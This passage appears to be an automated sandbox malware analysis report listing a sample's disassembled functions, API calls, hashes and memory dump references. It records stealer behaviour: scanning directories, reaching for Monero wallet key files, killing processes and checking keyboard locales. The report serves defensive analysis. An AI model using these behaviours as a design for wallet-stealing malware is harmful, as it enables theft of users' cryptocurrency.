                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: 8cf26f2f3a655263793ea0dad8c0337875b87074fa8590789eade542735f51fe
                                        • Instruction ID: 27b22c82c0da35c609d5be7d94028331df045142c3d41d913e95371d87f4219d
                                        • Opcode Fuzzy Hash: 8cf26f2f3a655263793ea0dad8c0337875b87074fa8590789eade542735f51fe
                                        • Instruction Fuzzy Hash: 2A12EEB191015C9BCB15EB61CCA6EFE7379AF54304F4045DEA20E62091EF386B98CF69
                                        Function 004EDF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00500C32), ref: 004EDF5E
                                        • StrCmpCA.SHLWAPI(?,005015C0), ref: 004EDFAE
                                        • StrCmpCA.SHLWAPI(?,005015C4), ref: 004EDFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EE4E0
                                        • FindClose.KERNEL32(000000FF), ref: 004EE4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: fc39db8f968523696fe4e1a7529d444678ee82a7d4b6f293555daf55ba11b646
                                        • Instruction ID: 6663c55e8567e01812177801de20ce828c2305c1696c2d2d12273a24db3e5300
                                        • Opcode Fuzzy Hash: fc39db8f968523696fe4e1a7529d444678ee82a7d4b6f293555daf55ba11b646
                                        • Instruction Fuzzy Hash: 8FF1CCB191011C9ACB25EB61CCA5EFE7339BF54304F4045DEA20E62091EF386B99CF5A
                                        Function 004EDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005015A8,00500BAF), ref: 004EDBEB
                                        • StrCmpCA.SHLWAPI(?,005015AC), ref: 004EDC33
                                        • StrCmpCA.SHLWAPI(?,005015B0), ref: 004EDC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EDECC
                                        • FindClose.KERNEL32(000000FF), ref: 004EDEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: a83661f187372ac7316175a475c9063cc0609440553edbbbc3ca115428567bb8
                                        • Instruction ID: 22e3cdc75646e4d19257149d46a1ba51fba9c13d354571e5cfb8f8c3ae8edcc1
                                        • Opcode Fuzzy Hash: a83661f187372ac7316175a475c9063cc0609440553edbbbc3ca115428567bb8
                                        • Instruction Fuzzy Hash: 679156B2E001089BCB14FB75DD56DFD733DAB84345F00865EFA0A56181EA389B1CCB9A
                                        Function 0093620F Relevance: 12.9, Strings: 9, Instructions: 1613COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ,J>$6{$>Fq$A_{$E{$]K)}$s S}$v~W?$]=
                                        • API String ID: 0-2808568579
                                        • Opcode ID: 51fe5d8d2d6280ca8ffd31f6dbc934001e7ddab69384095bfc3a674d5366139e
                                        • Instruction ID: 5240c81a549c0f3ecd608cbe29c5f271acb9ed33f9109191e2688a976f99f289
                                        • Opcode Fuzzy Hash: 51fe5d8d2d6280ca8ffd31f6dbc934001e7ddab69384095bfc3a674d5366139e
                                        • Instruction Fuzzy Hash: 27B2E6F36082009FE304AE2DEC8567ABBE9EBD4720F1A493DE6C5C3744E63598058697
                                        Function 0092DDF9 Relevance: 12.8, Strings: 9, Instructions: 1590COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #j[o$%7_$S8?$W8?$dw?$r-?]$w/=e$}h??$)"}
                                        • API String ID: 0-1978804692
                                        • Opcode ID: d330bb830353084277321b2102a7f28bc86a88a5161b40eaf64f28bb30cc3f6b
                                        • Instruction ID: ada7cb9e05f75f798ac76f213d7e4982fe6d6214e8b4cb0062f2f2b3742395e3
                                        • Opcode Fuzzy Hash: d330bb830353084277321b2102a7f28bc86a88a5161b40eaf64f28bb30cc3f6b
                                        • Instruction Fuzzy Hash: FAB226F360C204AFE304AE2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058657
                                        Function 004F98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004F9905
                                        • Process32First.KERNEL32(004E9FDE,00000128), ref: 004F9919
                                        • Process32Next.KERNEL32(004E9FDE,00000128), ref: 004F992E
                                        • StrCmpCA.SHLWAPI(?,004E9FDE), ref: 004F9943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F997A
                                        • CloseHandle.KERNEL32(00000000), ref: 004F9987
                                        • CloseHandle.KERNEL32(004E9FDE), ref: 004F9993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: eb69fad658730005edaa42f9fab370e2790bae1453ea7f524601f49682988ef7
                                        • Instruction ID: 1637dc52ee4593889fe4bd389f83c2f7acccf7b792697645c6ea0ed0a3bfc54a
                                        • Opcode Fuzzy Hash: eb69fad658730005edaa42f9fab370e2790bae1453ea7f524601f49682988ef7
                                        • Instruction Fuzzy Hash: AF11E27590421CABDB28DFA5DC48FEEB779BB88701F00858DF505A6240D7789A44CFA4
                                        Function 004F7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,005005B7), ref: 004F7D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004F7D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 004F7D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004F7DF2
                                        • LocalFree.KERNEL32(00000000), ref: 004F7EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: 05e07894d4bcf4ec19a02e811308419d5edda9eb34c70c0b104695037f0a5879
                                        • Instruction ID: 6149fcbb8fa88c27245160c5a06d64f6d662f276734ce0fc5236ce37410fdd40
                                        • Opcode Fuzzy Hash: 05e07894d4bcf4ec19a02e811308419d5edda9eb34c70c0b104695037f0a5879
                                        • Instruction Fuzzy Hash: C5413BB194021CABCB24DB94DC99BFEB774FB44704F1041DAE20962290DB386F88CF65
                                        Function 004EE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004FAA50: lstrcpy.KERNEL32(00500E1A,00000000), ref: 004FAA98
                                          • Part of subcall function 004FAC30: lstrcpy.KERNEL32(00000000,?), ref: 004FAC82
                                          • Part of subcall function 004FAC30: lstrcat.KERNEL32(00000000), ref: 004FAC92
                                          • Part of subcall function 004FACC0: lstrlen.KERNEL32(?,01458FB0,?,\Monero\wallet.keys,00500E1A), ref: 004FACD5
                                          • Part of subcall function 004FACC0: lstrcpy.KERNEL32(00000000), ref: 004FAD14
                                          • Part of subcall function 004FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004FAD22
                                          • Part of subcall function 004FABB0: lstrcpy.KERNEL32(?,00500E1A), ref: 004FAC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00500D79), ref: 004EE5A2
                                        • StrCmpCA.SHLWAPI(?,005015F0), ref: 004EE5F2
                                        • StrCmpCA.SHLWAPI(?,005015F4), ref: 004EE608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004EECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: f4c7b3b7ad790d09deca9735a73de8ae6a6aac9648b56ab3a6267e92de99c29f
                                        • Instruction ID: 8440f7b6af5f74a5ed6585e20a8f52c671bccd7c56416044e311fe17a249ece0
                                        • Opcode Fuzzy Hash: f4c7b3b7ad790d09deca9735a73de8ae6a6aac9648b56ab3a6267e92de99c29f
                                        • Instruction Fuzzy Hash: DC1231B2A1011C9BCB14FB61DDA6EFD7339AF54304F4045AEB60E52091EF386B58CB5A
                                        Function 004EA210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,004E4F3E,00000000,?), ref: 004EA251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>ON,00000000,00000000), ref: 004EA27A
                                        • LocalFree.KERNEL32(?,?,?,?,004E4F3E,00000000,?), ref: 004EA28F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844839394.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844940075.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844954135.0000000000BF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID: >ON
                                        • API String ID: 4291131564-925970133
                                        • Opcode ID: c4273c743aef996893d149c40884da1d486a6e560c630e181259b85217329ec9
                                        • Instruction ID: b6dc1ad977db77cc74890740d9c67f91a6ebf224d465bdfc7a602c9c43af9fdd
                                        • Opcode Fuzzy Hash: c4273c743aef996893d149c40884da1d486a6e560c630e181259b85217329ec9
                                        • Instruction Fuzzy Hash: D711D474240308AFEB14CF64DC95FAA77B5FB88B01F208189FE159B390C776A941CB54
                                        Function 00937C69 Relevance: 7.9, Strings: 5, Instructions: 1696COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1844617862.00000000007CA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1844416103.00000000004E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000004E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000050C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844433132.00000000007B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000945000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1844617862.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
